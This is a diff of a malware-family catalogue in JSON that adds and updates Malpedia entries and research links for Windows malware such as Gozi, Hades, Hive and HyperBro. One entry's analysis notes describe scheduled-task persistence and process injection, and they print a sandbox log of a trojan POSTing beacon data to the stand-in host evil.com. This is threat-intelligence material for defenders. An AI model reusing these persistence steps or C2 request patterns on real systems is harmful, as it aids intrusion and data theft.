"https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", @@ -16837,6 +19262,19 @@ "uuid": "fb2e42bf-6845-4eb3-9fe7-85a447762bce", "value": "Gophe" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gotroj", + "https://www.rsa.com/content/dam/en/white-paper/the-shadows-of-ghosts-carbanak-report.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b4446bc0-41a1-4934-9fd0-a73b91589994", + "value": "GOTROJ" + }, { "description": "", "meta": { @@ -16855,14 +19293,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", - "https://www.secureworks.com/research/gozi", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://www.secureworks.com/research/threat-profiles/gold-swathmore", "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", + "https://www.secureworks.com/research/gozi", "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", "https://github.com/mlodic/ursnif_beacon_decryptor", "https://lokalhost.pl/gozi_tree.txt", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", "https://www.youtube.com/watch?v=BcFbkjUVc7o", + "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/" ], @@ -16925,10 +19368,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grandoreiro", + "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/", "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", - "https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks" + "https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks", + "https://blueliv.com/resources/reports/MiniReport-Blueliv-Bancos-ESP-LAT.pdf", + "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853" ], "synonyms": [], "type": [] @@ -16957,12 +19403,13 @@ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://content.fireeye.com/m-trends/rpt-m-trends-2020", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/", + "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season", "https://redcanary.com/blog/frameworkpos-and-the-adequate-persistent-threat/", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", - "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season", + "https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/", "https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf", - "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html" + "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", + "http://www.secureworks.com/research/threat-profiles/gold-franklin" ], "synonyms": [ "FrameworkPOS", @@ -17066,11 +19513,14 @@ "value": "GRILLMARK" }, { - "description": "", + "description": "GRIMAGENT is a backdoor that can execute arbitrary commands, download files, create and delete scheduled tasks, and execute programs via scheduled tasks or via the ShellExecute API. The malware persists via a randomly named scheduled task and a registry Run key. The backdoor communicates to hard-coded C&C servers via HTTP requests with portions of its network communications encrypted using both asymmetric and symmetric cryptography. GRIMAGENT was used during some Ryuk Ransomware intrusions in 2020.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent", - "https://twitter.com/bryceabdo/status/1352359414746009608" + "https://twitter.com/bryceabdo/status/1352359414746009608", + "https://blog.group-ib.com/grimagent", + "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets", + "https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer" ], "synonyms": [], "type": [] @@ -17095,6 +19545,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grunt", + "https://ti.qianxin.com/blog/articles/Suspected-Russian-speaking-attackers-use-COVID19-vaccine-decoys-against-Middle-East/", "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", "https://twitter.com/ItsReallyNick/status/1208141697282117633" ], @@ -17143,6 +19594,20 @@ "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", "value": "H1N1 Loader" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.habitsrat", + "https://www.intezer.com/blog/malware-analysis/habitsrat-used-to-target-linux-and-windows-servers/", + "https://www.intezer.com/blog/malware-analysis/habitsrat-used-to-target-linux-and-windows-servers" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b39de9b2-7739-44f4-a03b-1fffa0c0df04", + "value": "HabitsRAT (Windows)" + }, { "description": "", "meta": { @@ -17169,21 +19634,49 @@ "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", "value": "HackSpy" }, + { + "description": "Ransomware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hades", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure", + "http://www.secureworks.com/research/threat-profiles/gold-winter", + "https://www.bleepingcomputer.com/news/security/evil-corp-switches-to-hades-ransomware-to-evade-sanctions/", + "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", + "https://www.accenture.com/us-en/blogs/security/ransomware-hades", + "https://twitter.com/inversecos/status/1381477874046169089?s=20", + "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://awakesecurity.com/blog/incident-response-hades-ransomware-gang-or-hafnium/", + "https://www.accenture.com/us-en/blogs/cyber-defense/unknown-threat-group-using-hades-ransomware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ab9b4a89-c35b-42aa-bffb-98fccf7d318f", + "value": "Hades" + }, { "description": "Hakbit ransomware is written in .NET. It uploads (some) files to be encrypted to a ftp-server.\r\nThe ransom note is embedded - in earlier versions as plain string, then as base64 string. In some versions, these strings are slightly obfuscated.\r\n\r\nContact is via an email address hosted on protonmail. Hakbit (original) had hakbit@, more recent \"KiraLock\" has kiraransom@ (among others of course).\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hakbit", + "https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/", + "https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4", "http://id-ransomware.blogspot.com/2019/11/hakbit-ransomware.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://unit42.paloaltonetworks.com/thanos-ransomware/", "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland", + "https://blog.cyble.com/2021/06/05/prometheus-an-emerging-apt-group-using-thanos-ransomware-to-target-organizations/", + "https://unit42.paloaltonetworks.com/thanos-ransomware/", + "https://securelist.com/cis-ransomware/104452/", "https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf", "https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/", - "https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/" + "https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/", + "https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/", + "https://unit42.paloaltonetworks.com/prometheus-ransomware/" ], "synonyms": [ "Thanos Ransomware" @@ -17214,21 +19707,35 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", - "https://twitter.com/TheDFIRReport/status/1359669513520873473", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-hancitor-followup-malware/", + "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/", + "https://www.vmray.com/cyber-security-blog/hancitor-multi-step-delivery-process-malware-analysis-spotlight/", + "https://inquest.net/blog/2021/04/16/unearthing-hancitor-infrastructure", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/", + "https://elis531989.medium.com/dissecting-and-automating-hancitors-config-extraction-1a6ed85d99b8", + "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", + "https://pid4.io/posts/how_to_write_a_hancitor_extractor/", + "https://www.uperesia.com/hancitor-packer-demystified", + "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/", + "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/", "https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", - "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", - "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", - "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", - "https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/", - "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", + "https://blog.group-ib.com/prometheus-tds", "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html", - "https://www.uperesia.com/hancitor-packer-demystified", - "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/" + "https://isc.sans.edu/diary/rss/27618", + "https://twitter.com/TheDFIRReport/status/1359669513520873473", + "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", + "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", + "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/", + "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", + "https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", + "https://blog.group-ib.com/hancitor-cuba-ransomware", + "https://cyber-anubis.github.io/malware%20analysis/hancitor/" ], "synonyms": [ "Chanitor" @@ -17280,6 +19787,20 @@ "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", "value": "Harnig" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.haron", + "https://threatpost.com/ransomware-gangs-haron-blackmatter/168212/", + "https://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b" + ], + "synonyms": [], + "type": [] + }, + "uuid": "788c44c1-d1cd-4b17-8fa9-116d682c3661", + "value": "Haron Ransomware" + }, { "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.", "meta": { @@ -17317,16 +19838,20 @@ "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/", "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", - "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", "https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/", "https://www.cyberbit.com/hawkeye-malware-keylogging-technique/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", + "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry", "https://www.secureworks.com/research/threat-profiles/gold-galleon", - "https://securelist.com/apt-trends-report-q2-2019/91897/", + "http://www.secureworks.com/research/threat-profiles/gold-galleon", "https://www.govcert.ch/blog/analysis-of-an-unusual-hawkeye-sample/", + "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", "https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html", "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/" ], @@ -17354,7 +19879,7 @@ "type": [] }, "uuid": "d643273f-7a53-4703-bf65-95716d55a5dd", - "value": "HDMR Ransomware" + "value": "HDMR" }, { "description": "", @@ -17390,8 +19915,14 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty", "https://twitter.com/fwosar/status/1359167108727332868", "https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html", + "https://www.bleepingcomputer.com/news/security/hellokitty-ransomware-is-targeting-vulnerable-sonicwall-devices/", + "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/", + "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/", + "https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks", + "https://blog.malwarebytes.com/threat-spotlight/2021/03/hellokitty-when-cyberpunk-met-cy-purr-crime/", + "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html", "https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/", - "https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks" + "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/" ], "synonyms": [ "KittyCrypt" @@ -17399,7 +19930,7 @@ "type": [] }, "uuid": "433c97b5-89ac-4783-a312-8bb890590ff0", - "value": "HelloKitty" + "value": "HelloKitty (Windows)" }, { "description": "", @@ -17407,6 +19938,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", "https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", @@ -17484,7 +20016,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", "https://blog.dcso.de/enterprise-malware-as-a-service/", + "https://vxhive.blogspot.com/2020/11/deep-dive-into-hermes-ransomware.html", "https://www.youtube.com/watch?v=9nuo-AGg4p4", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", "https://dcso.de/2019/03/18/enterprise-malware-as-a-service", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], @@ -17672,6 +20206,22 @@ "uuid": "b6734ca0-599f-4992-9094-218d01ddfb3a", "value": "Hisoka" }, + { + "description": "Ransomware used in a double extortion scheme, first encountered June 2021.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hive", + "https://www.ic3.gov/Media/News/2021/210825.pdf", + "https://labs.sentinelone.com/hive-attacks-analysis-of-the-human-operated-ransomware-targeting-healthcare/", + "https://www.netskope.com/blog/hive-ransomware-actively-targeting-hospitals", + "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4aaa039f-6239-46d8-850d-69e9cbd12e9e", + "value": "hive" + }, { "description": "", "meta": { @@ -17789,6 +20339,19 @@ "uuid": "cbe47d19-2f74-4dbc-84b5-44c31518c8a7", "value": "HorusEyes RAT" }, + { + "description": "Warsaw trojan is a new banking trojan based on the Hours Eyes RAT core engine.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.horus_eyes_rat", + "https://seguranca-informatica.pt/the-clandestine-horus-eyes-rat-from-the-underground-to-criminals-arsenal/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5a368326-d594-4a9b-94ff-7e2d41158006", + "value": "Horus Eyes RAT" + }, { "description": "", "meta": { @@ -17831,14 +20394,20 @@ "https://www.youtube.com/watch?v=h3KLKCdMUUY", "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", "https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/wsh_rat.md", + "https://cofense.com/houdini-worm-transformed-new-phishing-attack/", "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated", + "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/", + "https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/", "https://myonlinesecurity.co.uk/more-agenttesla-keylogger-and-nanocore-rat-in-one-bundle/", + "https://www.youtube.com/watch?v=XDAiS6KBDOs", "https://blogs.360.cn/post/APT-C-44.html", + "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns", "http://blog.morphisec.com/hworm-houdini-aka-njrat", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "http://blogs.360.cn/post/analysis-of-apt-c-37.html", "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks", - "https://cofense.com/houdini-worm-transformed-new-phishing-attack/" + "https://www.cadosecurity.com/post/threat-group-uses-voice-changing-software-in-espionage-attempt", + "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html" ], "synonyms": [ "Hworm", @@ -17886,6 +20455,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran", "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", "https://www.secureworks.com/research/threat-profiles/bronze-mayfair", @@ -18009,17 +20579,23 @@ "value": "HxDef" }, { - "description": "", + "description": "HyperBro is a RAT that has been observed to target primarily within the gambling industries, though it has been spotted in other places as well. The malware typically consists of 3 or more components: a) a genuine loader typically with a signed certification b) a malicious DLL loader loaded from the former component via DLL hijacking c) an encrypted and compressed blob that decrypts to a PE-based payload which has its C2 information hardcoded within. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/", "https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/", "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", + "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf", "https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/", "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf", + "https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx", "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf", + "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html", + "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html", "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", @@ -18031,59 +20607,123 @@ "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5", "value": "HyperBro" }, + { + "description": "Sideloader used by EmissaryPanda", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl", + "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Slides-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf", + "https://norfolkinfosec.com/emissary-panda-dll-backdoor/", + "https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx", + "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf", + "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf", + "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html", + "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Article-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf", + "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html", + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/" + ], + "synonyms": [ + "FOCUSFJORD", + "Soldier", + "Sysupdate" + ], + "type": [] + }, + "uuid": "84f43641-77bc-4dcb-a104-150e8574da22", + "value": "HyperSSL" + }, { "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html 